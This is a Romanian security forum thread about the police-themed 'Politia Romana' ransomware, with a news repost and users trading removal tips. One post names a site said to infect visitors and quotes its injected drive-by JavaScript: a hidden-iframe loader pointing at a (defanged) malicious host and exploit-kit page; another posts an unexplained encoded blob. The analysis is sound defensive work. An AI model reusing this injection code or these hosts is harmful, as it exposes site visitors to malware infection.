Jump to content
Fi8sVrs

Virusul “Politia Romana” combatut

Recommended Posts

  • Active Members

Virusul-pirateriei.png

Cei de la Bitdefender au anuntat astazi disponibilitatea unei aplicatii gratuite impotriva "virusului pirateriei" care a infectat milioane de utilizatori din intreaga lume prin intermediul unui mesaj fals aparent trimis din partea politiei.

Pentru cei care nu au auzit deja, acest virus este cunoscut si sub denumirea de "virusul Politia Romana" si afiseaza un mesaj prin care incrimineaza proprietarul calculatorului afectat de piraterie, ulterior solicitand o suma de bani pentru deblocarea calculatorului.

Virusul verifica adresa IP a victimei, o asigura ca mesajul este din partea politiei si o acuza de un delict pe care l-ar fi putut comite si fara sa-si dea seama. Fata de amenintari similare mai vechi, care trimiteau asa zise "amenzi" pentru pornografie, aceasta pune accentul pe infractiuni de piraterie software, a filmelor sau a albumelor muzicale.

Atacatorii intimideaza utilizatorii cu mesaje localizate ce par a veni din partea autoritatilor din tari precum Romania, Statele Unite ale Americii, Marea Britanie, Germania, Austria si Olanda. La noi in tara, au fost solicitate plati ale unor sume de 100 de dolari sau 300 de lei pentru eventuala deblocare a computerului.

Dupa cum stim cu totii pirateria este un fenomen global, astfel incat rata de raspandire a virusului este incredibila, iar numarul celor care au cazut prada escrocheriei creste pe zi ce trece. Avand originie ruseasca, astfel de virusi de tip "Ransom" reusesc sa blocheze complet calculatoarele infectate si sa convinga tot mai multi utilizatori sa plateasca in schimbul eliminarii restrictiilor.

Solutia celor de la Bitdefender se adreseaza celor care au fost deja afectati de acest Trojan.Ransom.IcePol carora li se recomanda instalarea aplicatiei regasite aici si rularea acesteia in Safe Mode.

via Virusul “Politia Romana” combatut - Yahoo! ?tiri România

Link to comment
Share on other sites

Am fost si eu victima ca sa zici asa cu "Politia Romana" ,ca mi-a blocat pc'ul ....drace!

M-am dus repede in Safe Mode Networking sa iau acel program de la BitDefender adica RemovalTool , dupa am intrat in Safe Mode normal , am incercat cu RemovalTool si nu mi-a mers.

Asa ca am luat ComboFix si am scapat de asa zisul Virus Politia Romana!

Link to comment
Share on other sites

Salutare! Este pentru prima data cand vad acest virus "instalat" intr-un pc de al unui prieten si nu as vrea sa ma dau batut pentru ca nu reusesc neam sa il scot. Problema este ca nu pot accesa safe mode de nici o culoare (se blocheaza la classpnp) si nu am cum sa rulez combofix. Am incercat cu un windows live + un stick cu combofix, dar nu imi scaneaza, imi arata 2,3 chestii si atat. Acum scanez cu un kaspersky livecd, dar dureaza o eternitate. Ce sfaturi imi puteti oferi?

Link to comment
Share on other sites

Daca poti uploadeaza undeva un fisier infectat sa ma uit prin el si poate reusesc sa scot codul de verificare :)

Site-ul asta e infectat cu acest virus.

http://www.receivesmsonline.com

Atentie la simpla afisare a paginii se instaleaza virusul. Foloseste un fel de Java Drive By.

Link to comment
Share on other sites

Am deschis pagina si inca nu am luat virusul ce naiba.

Waw ce nisa tare de cleanfiles.. super.

Nici la mine nu a mers. Am facut tot ce era posibil. Pagina contine linia asta:


</body><script type="text/javascript" src="hxxp://adultbiz.in/new/jquery.php"></script>

Aici se incarca un script care detecteaza browserul si incarca un payload:

function showBrowVer()
{
var data = browserDetectNav();


if (data[0]) {
if ((data[0] == 'Opera' || data[0] == 'MSIE' || data[0] == 'Firefox') & data[3] == 'Windows'){
var divTag=document.createElement('div');
divTag.id='dt';
document.body.appendChild(divTag);
var js_kod2 = document.createElement('iframe');
js_kod2.src = 'hxxp://test1.elguay.es/display/seek.php';
js_kod2.width = '5px';
js_kod2.height = '3px';
js_kod2.setAttribute('style','visibility:hidden');
document.getElementById('dt').appendChild(js_kod2);
}
}
}

Acum trebuia sa se incarce un exploit kit. O sa incerc si pe un sistem cu xp/java/flash/pdf/opera sa vad daca reusesc sa fiu "exploatat"

Link to comment
Share on other sites

Salutare! Este pentru prima data cand vad acest virus "instalat" intr-un pc de al unui prieten si nu as vrea sa ma dau batut pentru ca nu reusesc neam sa il scot. Problema este ca nu pot accesa safe mode de nici o culoare (se blocheaza la classpnp) si nu am cum sa rulez combofix. Am incercat cu un windows live + un stick cu combofix, dar nu imi scaneaza, imi arata 2,3 chestii si atat. Acum scanez cu un kaspersky livecd, dar dureaza o eternitate. Ce sfaturi imi puteti oferi?

Si eu am avut pe cineva care il luase acum ceva timp si reusisem sa il scot ,de cand incepea sa se logheze Windows apasam repetat pe Ctrl +Alt + Supr si opream din Task manager tot ce aparea , si asa reusisem sa pot umbla pe PC sa ii scot microbii.

Screen_Shot001.jpg

windows 7 screenshot

Link to comment
Share on other sites

Vedeti aici in aceste arhive daca este ceva bun.

ps: sunt un atom de 128 ani

MoAJnoS6SJGaOlk6LlGVKlwV+yzaQfPtQfPrL5h2iI9DHhz6S4hPggAJT4TGOg93DxHVT4A5eo6RTgH7ng5NAx0TblHSKgLtbgA3K4LKfm0aQf11MoAJnoS6SJGaOlk6LlGVKlwV+yzaQfPtQfPrMghzgmXgixP6S4hIbYkabk0xMlrO0ILfLtTOMH/lOH1u+8QHpjTig4K9fk/rHfTeghhUDxXTQf11MoAJnoS6SJGaOlk6LlGVKlwV+yzaQfPtQfPrLibkp50YTgq6S4hRf60OggTaLlzND8hGfITVKxA4g40ipG9AfJ6eg5BJLfHsgkcmihLJ+xAQQf11MoAJnoS6SJGaOlk6LlGVKlwV+yzaQfPtQfPrnHQN+hT1KHP6S4hhTohjfiB7fG66fI0DAtAxf80QMihNA6A30GJJSjAR0xkk+gk2gYktihQ=Qf11MoAJnoS6SJGaOlk6LlGVKlwV+yzaQfPtQfPrL662Hi6MMxP6S4hLMmPJAJQXLIQGHjBLiIT5D86xbg3tbJQ3+o1KTGTMKHHG+g0YbyQF+GuT

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...